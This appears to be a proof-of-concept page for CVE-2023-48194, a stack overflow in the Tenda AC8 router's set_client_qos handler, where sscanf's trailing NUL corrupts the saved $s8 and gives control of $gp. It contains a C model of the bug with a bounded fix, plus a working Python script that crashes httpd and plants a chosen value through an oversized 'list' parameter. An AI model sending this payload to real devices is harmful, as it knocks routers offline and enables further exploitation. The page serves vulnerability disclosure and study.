
CVE-2023-48194 PoC — Tenda AC8 security vulnerability

Associated Vulnerability
Title: Tenda AC8 security vulnerability (CVE-2023-48194)
Description: Tenda AC8 is a wireless router made by the Chinese company Tenda. Tenda AC8 V16.03.34.09 contains a security vulnerability caused by an sscanf call: the last byte of the saved s8 register is overwritten with \x00. After set_client_qos executes, control of the gp register is obtained.
Readme
# CVE-2023-48194
## Overview

Firmware download links:

https://www.tenda.com.cn/download/detail-3683.html

https://down.tenda.com.cn/uploadfile/AC8/V16.03.34.09.zip

https://static.tenda.com.cn/tdcweb/download/uploadfile/AC8/V16.03.34.09.zip

## Affected version

AC8/V16.03.34.09

## Vulnerability details

Tenda AC8 v4, firmware V16.03.34.09. The `list` parameter of the `SetNetControlList` request is parsed with `sscanf` into a fixed-size stack buffer in `set_client_qos`. `sscanf` appends a terminating NUL after the copied token, so a token that fills the buffer places that `\x00` one byte past its end, overwriting the low byte of the saved `$s8` (the MIPS frame pointer). The frame is then restored through the corrupted `$s8`, so the stack slot from which `$gp` is reloaded after `set_client_qos` returns now lies inside attacker-controlled data: the attacker obtains control of the `gp` register.

![image-20231110220324578](./assets/image-20231110220324578-1720273401785-36.png)

![image-20231111010734363](./assets/image-20231111010734363-1720273369808-31.png)

![image-20231110211938397](./assets/image-20231110211938397-1720273369809-32.png)
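To make the sscanf behaviour concrete, here is an added example (not Tenda's code and not from the original PoC repository) that models a frame laid out as the page describes: a 0x100-byte list buffer directly followed by the saved `$s8` slot, encoded little-endian. The buffer size, the slot position and the sample value 0x407ff818 are assumptions taken from the PoC's padding arithmetic. It shows that an unbounded `%s` writes `strlen(token) + 1` bytes, so a token of exactly 0x100 bytes zeroes the low byte of the saved register (the "list len >= 0x100" threshold the PoC notes) and a longer token replaces the slot entirely, while the width-limited form `%255s` leaves the slot untouched.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Illustrative model of the frame described on the page (assumed layout,
 * not Tenda's code): a 0x100-byte list buffer immediately followed by the
 * saved $s8 slot, then a little of the caller's frame. */
#define LIST_BUF   0x100
#define LIST_FMT   "%255s"            /* LIST_BUF - 1 characters, leaving room for the NUL */
#define TAIL       32
#define FRAME_SIZE (LIST_BUF + 4 + TAIL)
#define SAVED_S8   0x407ff818u        /* stack address of the kind used in the PoC's pad calculation */

/* The target is assumed little-endian, so the slot is encoded explicitly
 * instead of relying on the host's byte order. */
static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)v;
    p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16);
    p[3] = (unsigned char)(v >> 24);
}

static uint32_t get_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Parse `list` into the modelled frame and return what the saved-$s8 slot
 * holds afterwards.  hardened == 0 uses the unbounded "%s" the page blames;
 * hardened != 0 uses a width-limited conversion. */
uint32_t parse_list(const char *list, uint32_t saved_s8, int hardened)
{
    unsigned char frame[FRAME_SIZE];
    memset(frame, 0, sizeof frame);
    put_le32(frame + LIST_BUF, saved_s8);

    if (hardened)
        (void)sscanf(list, LIST_FMT, (char *)frame);  /* at most LIST_BUF bytes including the NUL */
    else
        (void)sscanf(list, "%s", (char *)frame);      /* strlen(list) + 1 bytes, unchecked */

    return get_le32(frame + LIST_BUF);
}

/* Run the model on a list of n non-space bytes ("%s" stops at whitespace)
 * with the saved $s8 set to SAVED_S8.  Returns 0 if n would overrun the
 * model's own buffers. */
uint32_t demo(size_t n, int hardened)
{
    char list[FRAME_SIZE];
    if (n >= sizeof list)
        return 0;
    memset(list, 'a', n);
    list[n] = '\0';
    return parse_list(list, SAVED_S8, hardened);
}

int main(void)
{
    printf("saved $s8 before parsing        : 0x%08x\n", SAVED_S8);
    printf("%%s,    0x0ff-byte list          : 0x%08x (slot intact)\n", demo(0x0ff, 0));
    printf("%%s,    0x100-byte list          : 0x%08x (low byte zeroed by the NUL)\n", demo(0x100, 0));
    printf("%%s,    0x104-byte list          : 0x%08x (slot fully replaced)\n", demo(0x104, 0));
    printf("%%255s, 0x104-byte list          : 0x%08x (bounded: slot intact)\n", demo(0x104, 1));
    return 0;
}
```

The fix shown is the one `sscanf` itself offers, a field width one less than the destination size; on the real firmware the equivalent change is to bound the conversion to the stack buffer's size, or to copy the parameter with an explicit length check before parsing it.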

## PoC

A PoC that crashes the httpd process with `Segmentation fault (core dumped)`. It places a chosen 32-bit value at offset 0x58 into the `list` parameter and pads the parameter to more than 0x100 bytes; a timeout or reset on the request means the server died while handling it:

```python
import requests
from pwn import p32

url = 'http://192.168.0.1/goform/SetNetControlList'
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36',
    'Accept': '*/*',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Connection': 'close',
}
# Content-Length is computed by requests from the body; a hand-written value would be overwritten.

# Distance from the start of the list buffer to the stack slot that is read
# through the corrupted $s8; both addresses were taken from the debugger.
pad = 0x407ff818 - 0x407ff7c0   # 0x58

target = 0x40302010             # value placed in the controlled slot
payload = b"list="
# p32 packs little-endian by default (pwntools context), as in the original PoC
payload += b"a" * pad + p32(target) + b"c" * (0x110 - pad)
# list length is 0x114 bytes; it must be >= 0x100 for the overflow to reach the saved registers

try:
    requests.post(url, headers=headers, data=payload, timeout=3)
except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectionError):
    # httpd crashed: either no reply within the timeout or the connection was reset
    print("test ok")
```

![image-20240706214512012](./assets/image-20240706214512012.png)

Stack before sscanf:

![image-20231110215023268](./assets/image-20231110215023268-1720273237248-10.png)

Stack after sscanf, just before the function returns:

![image-20231110215635663](./assets/image-20231110215635663-1720273237247-6.png)

![image-20231110222010134](./assets/image-20231110222010134-1720273237248-8.png)

![image-20231110222523163](./assets/image-20231110222523163-1720273237248-9.png)

File Snapshot

```
[4.0K] /data/pocs/373438c5a3a57227b98ed8ee7893d278f02f1fba
├── [4.0K] assets
│   ├── [ 51K] image-20231110211938397-1720273237248-7.png
│   ├── [ 51K] image-20231110211938397-1720273308784-16.png
│   ├── [ 51K] image-20231110211938397-1720273369809-32.png
│   ├── [ 51K] image-20231110211938397.png
│   ├── [ 12K] image-20231110215023268-1720273237248-10.png
│   ├── [ 12K] image-20231110215023268.png
│   ├── [ 75K] image-20231110215635663-1720273237247-6.png
│   ├── [ 75K] image-20231110215635663.png
│   ├── [ 31K] image-20231110220324578-1720273401785-36.png
│   ├── [ 31K] image-20231110220324578.png
│   ├── [128K] image-20231110222010134-1720273237248-8.png
│   ├── [128K] image-20231110222010134.png
│   ├── [ 40K] image-20231110222523163-1720273237248-9.png
│   ├── [ 40K] image-20231110222523163.png
│   ├── [160K] image-20231111010501906.png
│   ├── [ 19K] image-20231111010734363-1720273369808-31.png
│   ├── [ 19K] image-20231111010734363.png
│   └── [160K] image-20240706214512012.png
└── [1.8K] README.md

1 directory, 19 files
```